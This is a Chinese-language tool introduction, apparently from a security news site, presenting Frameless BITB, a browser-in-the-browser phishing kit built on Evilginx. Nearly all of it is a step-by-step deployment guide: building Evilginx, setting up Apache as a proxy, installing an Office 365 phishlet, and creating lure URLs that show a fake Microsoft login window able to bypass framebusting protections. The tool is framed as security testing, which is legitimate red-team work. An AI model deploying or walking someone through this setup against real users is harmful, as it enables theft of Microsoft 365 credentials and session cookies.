Alpha_h4ck
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9

关于Frameless BITB
Frameless BITB是一款功能强大的BitB(浏览器中的浏览器)安全测试工具,该工具可以帮助广大研究人员对目标Web应用程序执行BitB安全检测,以此提升Web应用的安全性能。
该工具不需要使用iframe,并且能够绕过传统的Framebusters技术,例如微软在其登录页面所实现的Framebusters。
工具要求
虚拟机VM
Go
Evilginx
Apache2
Phishlet
Lure
工具下载&配置
Evilginx配置
点击【这里】下载并构建最新版本的Evilginx。
然后将下载下来的Evilginx拷贝到“/home/evilginx”。
点击【这里】下载并安装最新版本Go语言环境:
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz nano ~/.profile
在profile文件中添加下列代码:
source ~/.profile export PATH=$PATH:/usr/local/go/bin
检查版本安装:
go version
安装make:
sudo apt install make
构建:
cd /home/evilginx/evilginx2 make
为Evilginx构建代码、phishlets和redirectors:创建一个新目录:
mkdir /home/evilginx/evilginx
拷贝Evilginx构建代码、phishlets和redirectors:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
快速修复Ubuntu防火墙:
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
在Ubuntu上,如果你遇到了“Failed to start nameserver on: :53”错误,可以尝试修改下列文件:
sudo nano /etc/systemd/resolved.conf
编辑/添加DNSStubListener为no > DNSStubListener=no。
然后运行下列命令即可:
sudo systemctl restart systemd-resolved
修改Evilginx配置
nano ~/.evilginx/config.json
将https_port从443修改为8443。
安装Apache2并启用Mods
安装Apache2:
sudo apt install apache2 -y
启用Apache2 mods:
sudo a2enmod proxy sudo a2enmod proxy_http sudo a2enmod proxy_balancer sudo a2enmod lbmethod_byrequests sudo a2enmod env sudo a2enmod include sudo a2enmod setenvif sudo a2enmod ssl sudo a2ensite default-ssl sudo a2enmod cache sudo a2enmod substitute sudo a2enmod headers sudo a2enmod rewrite sudo a2dismod access_compat
开启并启用Apache:
sudo systemctl start apache2 sudo systemctl enable apache2
此时,可以通过在浏览器中访问VM的IP来查看Apache和VM运行。
Frameless BITB下载
安装好Git:
sudo apt -y install git
然后使用下列命令将该项目源码克隆至本地:
git clone https://github.com/waelmas/frameless-bitb cd frameless-bitb
Apache自定义页面
创建下列三个目录,home保存主页,primary保存登录页面(后台),secondary保存BitB窗口(前端):
sudo mkdir /var/www/home sudo mkdir /var/www/primary sudo mkdir /var/www/secondary
拷贝每一个页面目录:
sudo cp -r ./pages/home/ /var/www/ sudo cp -r ./pages/primary/ /var/www/ sudo cp -r ./pages/secondary/ /var/www/
删除默认的Apache页面:
sudo rm -r /var/www/html/
拷贝O365 Phishlet到phishlets目录:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
工具运行
安装tmux,然后以开发者模式启动Evilginx:
sudo apt install tmux -y tmux new-session -s evilginx cd ~/evilginx/ ./evilginx -developer
Evilginx配置:
config domain fake.com config ipv4 127.0.0.1
需要注意的是,将Evilginx黑名单模式设置为NoAdd,将导致Apache的黑名单失效,因此所有的Apache流量都将进来:
blacklist noadd
设置Phishlet和Lure:
phishlets hostname O365 fake.com phishlets enable O365 lures create O365 lures get-url 0
打开浏览器访问Lure的URL地址即可。
工具使用
工具演示视频
工具介绍:【点我观看】
使用演示:【点我观看】
许可证协议
本项目的开发与发布遵循BSD-3-Clause开源许可证协议。
项目地址
Frameless BITB:【GitHub传送门】
参考资料
https://academy.breakdev.org/evilginx-mastery
https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation
https://janbakker.tech/evilginx-resources-for-microsoft-365/
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)